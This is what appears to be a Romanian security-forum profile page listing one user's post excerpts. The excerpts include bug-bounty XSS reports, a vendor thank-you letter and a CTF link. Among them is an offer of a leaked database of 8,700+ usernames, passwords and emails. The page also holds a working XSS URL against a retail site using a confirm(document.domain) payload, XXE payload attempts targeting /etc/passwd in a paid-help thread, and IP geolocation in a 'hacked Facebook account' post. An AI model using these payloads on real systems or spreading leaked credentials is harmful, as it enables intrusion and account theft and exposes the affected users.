Jump to content

dr.d3v1l

Active Members
  • Content count

    184
  • Joined

  • Last visited

  • Days Won

    2

dr.d3v1l last won the day on October 23

dr.d3v1l had the most liked content!

Community Reputation

59 Excellent

2 Followers

About dr.d3v1l

  • Rank
    Registered user

Profile Information

  • Gender
  1. [XSS] *.*.microsoft.com

  2. Dear Dr.d3v1l The vulnerabilities you reported has been fixed. As a token of our appreciation we would like to offer you a t-shirt. If you would like a t-shirt please provide us with your preferred t-shirt size (S/M/L/XL/XXL) and on what address you would like to receive the t-shirt. Thanks in advance for your reply and thanks again for your report. Sincerely,
  3. leak database

    leak database 8700+ (user,pass,mail ecc)
  4. [LFI]REGISTER.IT

    PRIVATE BUGBOUNTY AM PRIMIT 2 VPS SI 1 DOMENIU PENTRU 1 AN. STATUS:FIXED
  5. XSS *htc.com

    aici spunea ca mar hof aveai http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php
  6. XSS *htc.com

    http://estore.htc.com/tw/buy/zh-TW/shop/SearchDisplay?searchTerm=asd'- confirm(document.domain)-'&storeId=10001&catalogId=10001&langId=-7&pageSize =20&beginIndex=0&sType=SimpleSearch&resultCatEntryType=2&showResultsPa ge=true&searchSource=Q&pageView=
  7. XXE EXPLOITATION AJUTOR [$$$ recompensa]

    5) da sunt autizat , doar ca au cerut ce pot exploita . De asta am pus ($$) , dar din cate am mai verificat ... nu merge
  8. XXE EXPLOITATION AJUTOR [$$$ recompensa]

    am incerca si cuv gopher:// file:// ftp:// php://filter/convert.base64-encode/resource=/etc/passwd , dar nimica . Am log per server de la request dar nu pot citi etc/passwd
  9. XXE EXPLOITATION AJUTOR [$$$ recompensa]

    xxe = XML External Entity
  10. Salut Rst , cum as putea exploita complet aceasta xxe ? Am vazut un pic de topic de la owasp , da este local daca nu gresesc da se poate face si remote cred din cate am citit *Ofer o mica suma pentru cine ma ajuta sa gasesc un exploit valid .
  11. Cont de facebook spart

    http://www.ipgeek.net/109.166.136.78 ______________________________________ IP:109.166.136.78 Decimal:1839630414 ISP:Orange RomaniaOrganization:Orange RomaniaTime zone:Europe/BucharestIP Latitude:46 Longitude:25 Continent:EU
  12. [XSS]pornhub.com

    STATE:DUPLICATE bugbounty:https://hackerone.com/pornhub
  13. SickOs: 1.1 CTF rezolvata

    CTF DOWNLOAD ---> https://www.vulnhub.com/entry/sickos-11,132/ "This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them." _____________________________________________________________________________________________________________________________________________________ Există mai multe metode pentru ao rezolva : https://www.vulnhub.com/entry/sickos-11,132/#walkthrough _____________________________________________________________________________________________________________________________________________________
  14. Vulnerabilitati si Shell-uri

    Google ---> PDF . https://www.exploit-db.com/papers/ https://torrentz.eu/e90e81823b05850859879c163082d34ccd479389
  15. xss *.westernunion.com

    pai , din situ-l oficial ma trimis acolo , >.< , credeam ca era bun ahah
×